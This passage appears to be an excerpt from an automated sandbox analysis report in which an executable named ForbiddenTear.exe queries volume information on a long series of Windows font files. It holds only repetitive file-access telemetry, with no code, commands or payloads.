    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
